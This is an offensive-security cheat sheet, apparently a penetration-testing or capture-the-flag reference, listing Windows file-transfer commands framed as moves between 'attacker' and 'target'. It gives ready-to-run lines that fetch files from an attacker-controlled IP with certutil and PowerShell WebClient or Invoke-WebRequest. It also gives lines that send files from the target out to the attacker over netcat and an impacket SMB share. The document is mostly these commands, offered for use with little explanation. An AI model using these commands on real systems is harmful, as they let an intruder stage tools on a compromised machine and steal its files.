Escort (Payload)
Windows
Windows - certutil.exe
# certutil.exe
# -urlcache = display / delete URL cache entries
# -f = force fetch & update URL cache
$ certutil.exe -urlcache -f -split [http://[ip]/path_to_file]
Windows - Powershell
# .NET Object
$ powershell -c (New-Object System.Net.WebClient).DownloadFile('http://[ip]/[file]', 'C:\[filePath]')
$ powershell -c (New-Object System.Net.WebClient).DownloadString('http://[ip]/[file]')
# Invoke-WebRequest
$ powershell -c Invoke-WebRequest -uri 'http://[ip]/[file]' -outfile 'C:\[filePath]'
$ powershell -c wget 'http://[ip]/[file]' -outfile 'C:\[filePath]'
Windows - nc.exe
# nc.exe
# target -- file --> attacker
# need to transfer nc.exe to the target first
# Target (-nv can be omitted)
$ nc.exe -nv [ip] [port] < [filePath]
# Attacker
$ nc -lvnp [port] > [file]
SMB Server
# Attacker (Kali)
# target -- file --> attacker
$ impacket-smbserver [share name] [share path]
# Target (Windows)
# check the share
$ dir \\[ip]\[sharename]
# target -- file --> attacker
$ copy [filePath] \\[ip]\[sharename]